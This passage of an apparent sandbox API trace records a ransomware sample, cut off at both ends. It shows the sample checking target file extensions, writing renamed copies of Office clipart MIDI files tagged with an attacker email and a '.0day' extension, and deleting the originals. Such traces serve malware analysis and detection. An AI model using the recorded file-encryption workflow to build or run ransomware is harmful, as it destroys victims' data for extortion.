Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.158] lstrlenW (lpString=".doc") returned 4 [0271.158] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.158] lstrlenW (lpString=".docx") returned 5 [0271.158] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.158] lstrlenW (lpString=".pdf") returned 4 [0271.158] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.158] lstrlenW (lpString=".xls") returned 4 [0271.158] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.159] lstrlenW (lpString=".xlsx") returned 5 [0271.159] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.159] lstrlenW (lpString=".ppt") returned 4 [0271.159] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.159] lstrlenW (lpString=".zip") returned 4 [0271.159] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.159] lstrlenW (lpString=".rar") returned 4 [0271.159] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.159] lstrlenW (lpString=".bz2") returned 4 [0271.159] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.159] lstrlenW (lpString=".7z") returned 3 [0271.159] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.159] lstrlenW (lpString=".dbf") returned 4 [0271.159] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.159] lstrlenW (lpString=".1cd") returned 4 [0271.159] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0271.159] lstrlenW (lpString=".jpg") returned 4 [0271.159] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.159] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.159] lstrlenW (lpString="PARNT_07.MID") returned 12 [0271.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.271] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=6564) returned 1 [0271.271] CloseHandle (hObject=0x39c) returned 1 [0271.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid")) returned 0x20 [0271.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.300] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.300] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.308] GetLastError () returned 0x0 [0271.308] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x19a4, lpOverlapped=0x0) returned 1 [0271.309] WriteFile (in: hFile=0x394, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x19b0, lpOverlapped=0x0) returned 1 [0271.311] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.311] WriteFile (in: hFile=0x394, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.311] SetEndOfFile (hFile=0x394) returned 1 [0271.311] CloseHandle (hObject=0x394) returned 1 [0271.311] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.311] SetEndOfFile (hFile=0x2cc) returned 1 [0271.313] CloseHandle (hObject=0x2cc) returned 1 [0271.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid")) returned 1 [0271.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.319] lstrlenW (lpString=".doc") returned 4 [0271.319] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.319] lstrlenW (lpString=".docx") returned 5 [0271.319] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1 [0271.319] lstrlenW (lpString=".pdf") returned 4 [0271.319] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.319] lstrlenW (lpString=".xls") returned 4 [0271.319] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.319] lstrlenW (lpString=".xlsx") returned 5 [0271.319] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1 [0271.319] lstrlenW (lpString=".ppt") returned 4 [0271.319] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.319] lstrlenW (lpString=".zip") returned 4 [0271.319] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.319] lstrlenW (lpString=".rar") returned 4 [0271.319] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.320] lstrlenW (lpString=".bz2") returned 4 [0271.320] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.320] lstrlenW (lpString=".7z") returned 3 [0271.320] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.320] lstrlenW (lpString=".dbf") returned 4 [0271.320] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.320] lstrlenW (lpString=".1cd") returned 4 [0271.320] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.320] lstrlenW (lpString=".jpg") returned 4 [0271.320] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.320] lstrlenW (lpString=".doc") returned 4 [0271.320] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.320] lstrlenW (lpString=".docx") returned 5 [0271.320] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1 [0271.320] lstrlenW (lpString=".pdf") returned 4 [0271.320] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.320] lstrlenW (lpString=".xls") returned 4 [0271.320] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.320] lstrlenW (lpString=".xlsx") returned 5 [0271.320] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1 [0271.320] lstrlenW (lpString=".ppt") returned 4 [0271.320] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.320] lstrlenW (lpString=".zip") returned 4 [0271.321] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.321] lstrlenW (lpString=".rar") returned 4 [0271.321] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.321] lstrlenW (lpString=".bz2") returned 4 [0271.321] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.321] lstrlenW (lpString=".7z") returned 3 [0271.321] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.321] lstrlenW (lpString=".dbf") returned 4 [0271.321] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.321] lstrlenW (lpString=".1cd") returned 4 [0271.321] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0271.321] lstrlenW (lpString=".jpg") returned 4 [0271.321] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.321] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.321] lstrlenW (lpString="PARNT_10.MID") returned 12 [0271.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.321] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=5393) returned 1 [0271.321] CloseHandle (hObject=0x2cc) returned 1 [0271.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid")) returned 0x20 [0271.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.322] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.322] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.323] GetLastError () returned 0x0 [0271.323] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x1511, lpOverlapped=0x0) returned 1 [0271.325] WriteFile (in: hFile=0x394, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x1520, lpOverlapped=0x0) returned 1 [0271.327] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.327] WriteFile (in: hFile=0x394, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.327] SetEndOfFile (hFile=0x394) returned 1 [0271.327] CloseHandle (hObject=0x394) returned 1 [0271.327] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.327] SetEndOfFile (hFile=0x2cc) returned 1 [0271.330] CloseHandle (hObject=0x2cc) returned 1 [0271.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.331] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid")) returned 1 [0271.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.331] lstrlenW (lpString=".doc") returned 4 [0271.331] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.331] lstrlenW (lpString=".docx") returned 5 [0271.331] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1 [0271.331] lstrlenW (lpString=".pdf") returned 4 [0271.331] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.331] lstrlenW (lpString=".xls") returned 4 [0271.331] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.331] lstrlenW (lpString=".xlsx") returned 5 [0271.331] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1 [0271.331] lstrlenW (lpString=".ppt") returned 4 [0271.331] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.331] lstrlenW (lpString=".zip") returned 4 [0271.331] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.331] lstrlenW (lpString=".rar") returned 4 [0271.331] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.331] lstrlenW (lpString=".bz2") returned 4 [0271.331] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.332] lstrlenW (lpString=".7z") returned 3 [0271.332] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.332] lstrlenW (lpString=".dbf") returned 4 [0271.332] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.332] lstrlenW (lpString=".1cd") returned 4 [0271.332] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.332] lstrlenW (lpString=".jpg") returned 4 [0271.332] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.332] lstrlenW (lpString=".doc") returned 4 [0271.332] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.332] lstrlenW (lpString=".docx") returned 5 [0271.332] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1 [0271.332] lstrlenW (lpString=".pdf") returned 4 [0271.332] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.332] lstrlenW (lpString=".xls") returned 4 [0271.332] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.332] lstrlenW (lpString=".xlsx") returned 5 [0271.332] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1 [0271.332] lstrlenW (lpString=".ppt") returned 4 [0271.332] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.332] lstrlenW (lpString=".zip") returned 4 [0271.332] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.333] lstrlenW (lpString=".rar") returned 4 [0271.333] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.333] lstrlenW (lpString=".bz2") returned 4 [0271.333] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.333] lstrlenW (lpString=".7z") returned 3 [0271.333] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.333] lstrlenW (lpString=".dbf") returned 4 [0271.333] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.333] lstrlenW (lpString=".1cd") returned 4 [0271.333] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0271.333] lstrlenW (lpString=".jpg") returned 4 [0271.333] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.333] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.333] lstrlenW (lpString="ROAD_01.MID") returned 11 [0271.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.333] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=5983) returned 1 [0271.333] CloseHandle (hObject=0x2cc) returned 1 [0271.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 0x20 [0271.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.334] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.334] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.334] GetLastError () returned 0x0 [0271.334] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x175f, lpOverlapped=0x0) returned 1 [0271.337] WriteFile (in: hFile=0x394, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x1760, lpOverlapped=0x0) returned 1 [0271.338] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.338] WriteFile (in: hFile=0x394, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0271.338] SetEndOfFile (hFile=0x394) returned 1 [0271.338] CloseHandle (hObject=0x394) returned 1 [0271.517] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.517] SetEndOfFile (hFile=0x2cc) returned 1 [0271.691] CloseHandle (hObject=0x2cc) returned 1 [0271.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 1 [0271.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.722] lstrlenW (lpString=".doc") returned 4 [0271.723] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.723] lstrlenW (lpString=".docx") returned 5 [0271.723] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.723] lstrlenW (lpString=".pdf") returned 4 [0271.723] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.723] lstrlenW (lpString=".xls") returned 4 [0271.723] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.723] lstrlenW (lpString=".xlsx") returned 5 [0271.723] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.723] lstrlenW (lpString=".ppt") returned 4 [0271.723] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.723] lstrlenW (lpString=".zip") returned 4 [0271.723] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.723] lstrlenW (lpString=".rar") returned 4 [0271.723] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.723] lstrlenW (lpString=".bz2") returned 4 [0271.723] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.723] lstrlenW (lpString=".7z") returned 3 [0271.723] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.723] lstrlenW (lpString=".dbf") returned 4 [0271.723] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.723] lstrlenW (lpString=".1cd") returned 4 [0271.723] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.723] lstrlenW (lpString=".jpg") returned 4 [0271.723] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.723] lstrlenW (lpString=".doc") returned 4 [0271.724] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.724] lstrlenW (lpString=".docx") returned 5 [0271.724] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.724] lstrlenW (lpString=".pdf") returned 4 [0271.724] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.724] lstrlenW (lpString=".xls") returned 4 [0271.724] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.724] lstrlenW (lpString=".xlsx") returned 5 [0271.724] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.724] lstrlenW (lpString=".ppt") returned 4 [0271.724] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.724] lstrlenW (lpString=".zip") returned 